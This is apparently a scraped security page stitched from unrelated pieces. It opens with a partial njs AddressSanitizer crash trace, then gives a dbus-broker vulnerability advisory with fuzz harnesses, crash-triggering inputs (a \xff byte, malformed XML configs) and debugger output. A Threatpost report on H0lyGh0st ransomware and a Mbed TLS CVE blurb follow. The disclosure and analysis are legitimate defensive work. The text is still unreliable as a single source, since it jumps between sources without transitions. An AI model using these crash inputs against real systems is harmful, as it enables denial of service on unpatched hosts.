    ==8116==The signal is caused by a READ memory access.
    ==8116==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4eed5c in njs_value_own_enumerate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21
        #1 0x53a37f in njs_object_traverse /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:1230:23
        #2 0x5a16ed in njs_builtin_match_native_function /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_builtin.c:776:11
        #3 0x592ad4 in njs_add_backtrace_entry /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:1308:15
        #4 0x592ad4 in njs_error_stack_new /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:102:16
        #5 0x592ad4 in njs_error_stack_attach /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:161:11
        #6 0x50506e in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1007:16
        #7 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #8 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #9 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #10 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #11 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #12 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #13 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #14 0x7f0a16923082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #15 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21 in njs_value_own_enumerate
    ==8116==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

2 participants

CVE-2022-34032: SEGV src/njs_value.c:240:21 in njs_value_own_enumerate · Issue #524 · nginx/njs

An issue was discovered in dbus-broker before 31. Multiple NULL pointer dereferences can be found when supplying a malformed XML config file.

Multiple memory corruption vulnerabilities were identified in dbus-broker, the standard dbus implementation for Fedora-based systems. Supplying malformed service or config files will cause the dbus-broker to crash or to overread memory boundaries.

**Vendor description**

_"The dbus-broker project is an implementation of a message bus as defined by the D-Bus specification. Its aim is to provide high performance and reliability, while keeping compatibility to the D-Bus reference implementation.It is exclusively written for Linux systems, and makes use of many modern features provided by recent linux kernel releases."_ 

Source: https://github.com/bus1/dbus-broker

**Business recommendation**

The vendor provides a patch which should be installed immediately. 

**Vulnerability overview/description****1) Stack-Buffer Over-Read (CVE-2022-31212) **

Dbus-Broker depends on c-uitl/c-shquote to parse DBus service's Exec line. c-shquote contains a stack buffer over-read if a malicious Exec line is supplied. 

**2) Null Pointer Dereference (CVE-2022-31213) **

Multiple Null Pointer references can be found when supplying a malformed XML config file. 

**Proof of concept****1) Stack-Buffer Over-Read (CVE-2022-31212) **

Following harness was used to fuzz the function **c\_shquote\_parse\_argv()** as it is used in **src/launch/launcher.c of dbus-broker.** 

    #include <sys/types.h> 
    #include <unistd.h> 
    #include <stdio.h> 
    #include <string.h> 
    #include "c-shquote.h" 
    
    #define SIZE_65KB 66560 
    
    int main(int argc, char** argv) { 
      char fuzz_buf[SIZE_65KB] = ""; 
      ssize_t fuzz_len = read(STDIN_FILENO, fuzz_buf, SIZE_65KB); 
      char **out_argv; 
      ssize_t out_argc; 
      c_shquote_parse_argv(&out_argv, &out_argc, fuzz_buf, strlen(fuzz_buf)); 
      return 0; 
    } 

Passing \\xff to the STDIN of the testharness will cause following crash: 

    ==21744==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff98c675bf at pc 
    0x558e29cacc02 bp 0x7fff98c67490 sp 0x7fff98c67488 
    READ of size 1 at 0x7fff98c675bf thread T0 
    #0 0x558e29cacc01 in c_shquote_strncspn c-shquote/src/c-shquote.c:119:21 
    #1 0x558e29caff15 in c_shquote_parse_next c-shquote/src/c-shquote.c:540:31 
    #2 0x558e29cb09c2 in c_shquote_parse_argv c-shquote/src/c-shquote.c:620:21 
    #3 0x558e29cab7e9 in c-shquote/src/argv_parser.c:23:2 
    #4 0x7f07953a8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24) 
    #5 0x558e29bca15d in _start (c-shquote/src/harness_argv_parser+0x2015d) 
    Address 0x7fff98c675bf is located in stack of thread T0 at offset 287 in frame 
    #0 0x558e29cac54f in c_shquote_strncspn c-shquote/src/c-shquote.c:102 
    This frame has 1 object(s): 
    [32, 287) 'buffer' (line 103) <== Memory access at offset 287 overflows this variable 
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, 
    swapcontext or vfork 
    (longjmp and C++ exceptions *are* supported) 
    SUMMARY: AddressSanitizer: stack-buffer-overflow c-shquote/src/c-shquote.c:119:21 in 
    c_shquote_strncspn 
    Shadow bytes around the buggy address: 
    0x100073184e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e90: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 
    0x100073184ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    =>0x100073184eb0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f3 
    0x100073184ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184ed0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 
    0x100073184ee0: 00 f2 f2 f2 00 f3 f3 f3 00 00 00 00 00 00 00 00 
    0x100073184ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184f00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 
    Shadow byte legend (one shadow byte represents 8 application bytes): 
    Addressable: 00 
    Partially addressable: 01 02 03 04 05 06 07 
    Heap left redzone: fa 
    Freed heap region: fd 
    Stack left redzone: f1 
    Stack mid redzone: f2 
    Stack right redzone:f3 
    Stack after return:  f5 
    Stack use after scope: f8 
    Global redzone: f9 
    Global init order: f6 
    Poisoned by user: f7 
    Container overflow: fc 
    Array cookie: ac 
    Intra object redzone: bb 
    ASan internal: fe 
    Left alloca redzone: ca 
    Right alloca redzone: cb 
    ==21744==ABORTING 

The error occurs in the functions  **c\_shquote\_strnspn() and c\_shquote\_strncspn().** 

Both allocate a buffer like this: 

    bool buffer[UCHAR_MAX] = {}; 

UCHAR\_MAX is defined in the C standard header limits.h and equals 255. Thus, array indexes of 0-254 can be addressed. 

However, the buffer will then be accessed like this:   

**buffer\[(unsigned char)string\[i\]\],** where string is the commandline from STDIN (or the EXEC line in case of dbus-broker services). 

Passing **\\xff** will thus read an out of bounds array element. 

**2) Null Pointer Dereference (CVE-2022-31213) **

The dbus-broker config parser uses the expat library to parse XML files. 

**<limit name="max\_pendingonment"/>** is a valid XML line. Thus expat will parse it correctly. As no value is supplied in the statement, the limit\_max\_pendingonment parameter will contain a Null pointer. DBus-broker does not validate the result and tries to dereference the field, causing a crash. Multiple other XML edge case can be found that cause the expat library to correctly return a Null pointer, but are not handled correctly by the dbus-broker. 

Including **<limit name="max\_pendingonment"/>**  causes following error message: 

    Program received signal SIGSEGV, Segmentation fault. 
    0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 
    Missing separate debuginfos, use: yum debuginfo-install expat-2.2.5-4.el8.x86_64 libblkid- 
    2.32.1-28.el8.x86_64 libcap-2.26-5.el8.x86_64 libgcc-8.5.0-4.el8_5.x86_64 libmount-2.32.1- 
    28.el8.x86_64 libselinux-2.9-5.el8.x86_64 libuuid-2.32.1-28.el8.x86_64 pcre2-10.32- 
    2.el8.x86_64 sssd-client-2.5.2-2.el8_5.1.x86_64 systemd-libs-239-51.el8.x86_64 
    (gdb) bt 
    #0 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 
    #1 0x000000000040cf0a in util_strtou64 (valp=valp@entry=0x828bc8, string=0x0) at 
    ../src/util/string.c:42 
    #2 0x0000000000408f07 in config_parser_end_fn (userdata=0x7fffffffdf58, name=0x82278c 
    "limit") at ../src/launch/config.c:1140 
    #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 
    #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 
    #5 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 
    #6 0x000000000040425f in config_parser_include (parser=0x7fffffffdf50, root=0x0, 
    node=<optimized out>, nss_cache=0x7fffffffdf30, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1289 
    #7 config_parser_read (parser=parser@entry=0x7fffffffdf50, rootp=rootp@entry=0x7fffffffdf28, 
    path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf30, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1347 
    #8 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe098) at 
    ../src/launch/harness-config.c:24 

Following harness was used: 

    #include <c-list.h> 
    #include <c-stdaux.h> 
    #include <stdlib.h> 
    #include "launch/config.h" 
    #include "launch/nss-cache.h" 
    #include "util/dirwatch.h" 
    
    int main(int argc, char **argv) { 
    _c_cleanup_(config_parser_deinit) ConfigParser parser = CONFIG_PARSER_NULL(parser); 
    _c_cleanup_(config_root_freep) ConfigRoot *rootp = NULL; 
    _c_cleanup_(nss_cache_deinit) NSSCache nss_cache = NSS_CACHE_INIT; 
    _c_cleanup_(dirwatch_freep) Dirwatch *dirwatch = NULL; 
    int r; 
    r = dirwatch_new(&dirwatch); 
    config_parser_init(&parser); 
    r = config_parser_read(&parser, &rootp, argv[1], &nss_cache, dirwatch); 
    return 0; 
    } 

Following config file will cause another error: 

    00000000: 3c21 2d2d 202d 2d3e 0a0a 3c21 444f 4354  ..<!DOCT 
    00000010: 5950 4520 6720 5055 424c 4943 2022 2d2f  YPE g PUBLIC "-/ 
    00000020: 4e22 0a20 2268 7474 223e 0a3c 6275 7363  N". "htt">.<busc 
    00000030: 6f6e 6669 673e 0a0a 203c 7479 7065 3e73  onfig>.. <type>s 
    00000040: 643c 2f74 7970 653e 3c66 6f72 6b2f 3e0a  d</type><fork/>. 
    00000050: 203c 7374 616e 6461 7264 5f73 7973 e803   <standard_sys.. 
    00000060: 6d5f 7365 7276 6963 6564 6972 732f 3e0a  m_servicedirs/>. 
    00000070: 203c 7365 7276 6963 6564 6972 2072 6563   <servicedir rec 
    00000080: 6569 7665 5f74 7970 653d 2265 7272 6f72  eive_type="error 
    00000090: 222f 3e0a 3c61 6c6c 6f77 2072 6563 6569  "/>.<allow recei 
    000000a0: 7665 5f74 7970 653d 2273 6967 6e61 6c22  ve_type="signal" 
    000000b0: 2f3e 2d3e 203c 616c 6c6f 7720 7365 6e64  />-> <allow send 
    000000c0: 5f64 6573 7469 6e61 7469 6f6e 3d22 220a  _destination="". 
    000000d0: 2020 2073 656e 645f 696e 7465 7266 6163     send_interfac 
    000000e0: 653d 2222 202f 3e0a 3c61 6c6c 6f77 2073  e="" />.<allow s 
    000000f0: 656e 645f 6465 7374 696e 617d 696f 6e3d  end_destina}ion= 
    00000100: 2222 0a20 2020 7365 6e64 5f69 6e74 6572  "".   send_inter 
    00000110: 6661 6365 3d22 6f72 6522 2f3e 203c 212d  face="ore"/> <!- 
    00000120: 2d20 2d2d 3e20 3c64 656e 7920 7365 6e64  - --> <deny send 
    00000130: 5f64 6573 74                             _dest 

The error is following: 

    id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 
    Unknown element in /fuzzing_Data/dbus-broker-config/out/harness-config2-- 
    /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +8: 
    standard_sysm_servicedirs 
    Unknown attribute in /fuzzing_Data/dbus-broker-config/out/harness-config2-- 
    /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +9: 
    receive_type="error" 
    Program received signal SIGSEGV, Segmentation fault. 
    0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 
    #0 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 
    #1 0x00007ffff78714e2 in strdup () from /lib64/libc.so.6 
    #2 0x0000000000408e96 in config_parser_end_fn (userdata=0x7fffffffdf48, name=0x81b45c 
    "servicedir") at ../src/launch/config.c:1130 
    #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 
    #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 
    #5 0x00007ffff7b9fb6b in doProlog () from /lib64/libexpat.so.1 
    #6 0x00007ffff7ba0a5f in prologProcessor () from /lib64/libexpat.so.1 
    #7 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 
    #8 0x000000000040425f in config_parser_include (parser=0x7fffffffdf40, root=0x0, 
    node=<optimized out>, nss_cache=0x7fffffffdf20, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1289 
    #9 config_parser_read (parser=parser@entry=0x7fffffffdf40, rootp=rootp@entry=0x7fffffffdf18, 
    path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf20, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1347 
    #10 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe088) at 
    ../src/launch/harness-config.c:24 

**Vulnerable / tested versions**

The Git Master branch (dbus-broker-29) has been tested and found to be vulnerable (tested at commit 727bee57cd3e3b5806eb8599abbdd49984b75732). 

Furthermore, it also contains the vulnerable c-shquote library (tested at commit 83ccc2893385fcca1424b188f0f6c45a62f2b38d). 

**Vendor contact timeline**

CVE-2022-31213: Multiple Memory Corruption Vulnerabilities in dbus-broker

Microsoft has linked a threat that emerged in June 2021 and targets small-to-mid-sized businesses to state-sponsored actors tracked as DEV-0530.

Microsoft has linked a threat that emerged in June 2021 and targets small-to-mid-sized businesses to state-sponsored actors tracked as DEV-0530.

Microsoft researchers have linked an emerging ransomware threat that already has compromised a number of small-to-mid-sized businesses to financially motivated North Korean state-sponsored actors that have been active since last year.

A group tracked by researchers from Microsoft Threat Intelligence Center (MSTIC) as DEV-0530 but that calls itself H0lyGh0st has been developing and using ransomware in attacks since June 2021.

The group has successfully compromised small-to-mid-sized businesses—including manufacturing organizations, banks, schools, and event and meeting planning companies—in multiple countries starting as early as September, researchers from MTIC and Microsoft Digital Security Unit (MDSU) said in a blog post published Thursday.

H0lyGh0st’s standard modus operandi is to use a namesake ransomware to encrypt all files on the target device using the file extension .h0lyenc, then send the victim a sample of the files as proof. The group interacts with victims on a _.onion_ site that it maintains and on which it provides a contact form for victims to get in touch, researchers said.

_\[**FREE On-demand Event**: **Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **WATCH HERE**.\]_

The group typically demands payment in Bitcoin in exchange for restoring access to the files. On its website, H0lyGh0st claims that it won’t sell or publish victim data if they pay, researchers said. However, it uses double extortion to pressure targets to pay, threatening to publish stolen data on social media or send it to the victims’ customers if they don’t meet ransom demands.

****Introducing H0lyGh0st****

H0lyGh0st’s ransomware campaigns are financially motivated, with researchers observing text linked to a ransom note that they intercepted in which attackers claim they aim to “close the gap between the rich and poor,” researchers said.

“They also attempt to legitimize their actions by claiming to increase the victim’s security awareness by letting the victims know more about their security posture,” they said.

DEV-0530 also has connections with another North Korean-based group tracked as PLUTONIUM, also known as DarkSeoul or Andariel, according to MSTIC, with researchers observing communications between the two groups. H0lyGh0st also has been seen using tools created exclusively by PLUTONIUM, they said.

****A Tale of Two Families****

Since it began using ransomware in June 2021 and until May 2022, H0lyGh0st has employed two custom-developed malware families–SiennaPurple and SiennaBlue, researchers said. MSTIC identified four variants linked to these families: BTLC\_C.exe, HolyRS.exe, HolyLock.exe, and BLTC.exe.

BTLC\_C.exe is written in C++ and is classified as SiennaPurple, while the rest are written in the open-source Go programming language, researchers said. All of the variants are compiled into .exe to target Windows systems, they said.

BLTC\_C.exe is a portable ransomware developed by the group that was first seen in June 2021. However, it may have been an early version of the group’s development efforts, as it doesn’t have many features compared to all malware variants in the SiennaBlue family, researchers said.

Later in the group’s evolution, between October 2021 and May 2022, MSTIC observed a cluster of new DEV-0530 ransomware variants written in Go, which they classify as SiennaBlue variants, they said.

Though new Go functions have been added to the various variants over time, all the ransomware in the SiennaBlue family share the same core Go functions, researchers observed. These features include various encryption options, string obfuscation, public key management, and support for the internet and intranet, researchers said.

****Most Recent Variant****

The latest ransomware variant to be used by the group is BTLC.exe, which researchers have seen in the wild since April of this year, they said.

BTLC.exe can be configured to connect to a network share using the default username, password, and intranet URL hardcoded in the malware if the ServerBaseURL is not accessible from the device, researchers said.

The malware also includes a persistence mechanism in which it creates or deletes a scheduled task called _lockertask_ that can launch the ransomware. Once the malware is successfully launched as an administrator, it tries to connect to the default ServerBaseURL hardcoded in the malware, attempts to upload a public key to the C2 server, and encrypts all files in the victim’s drive, they said.

**_FREE On-demand Event: Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office. WATCH HERE._**

Emerging H0lyGh0st Ransomware Tied to North Korea

An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.2.0. In some configurations, an unauthenticated attacker can send an invalid ClientHello message to a DTLS server that causes a heap-based buffer over-read of up to 255 bytes. This can cause a server crash or possibly information disclosure based on error responses. Affected configurations have MBEDTLS_SSL_DTLS_CLIENT_PORT_REUSE enabled and MBEDTLS_SSL_IN_CONTENT_LEN less than a threshold that depends on the configuration: 258 bytes if using mbedtls_ssl_cookie_check, and possibly up to 571 bytes with a custom cookie check function.

Tag

#c++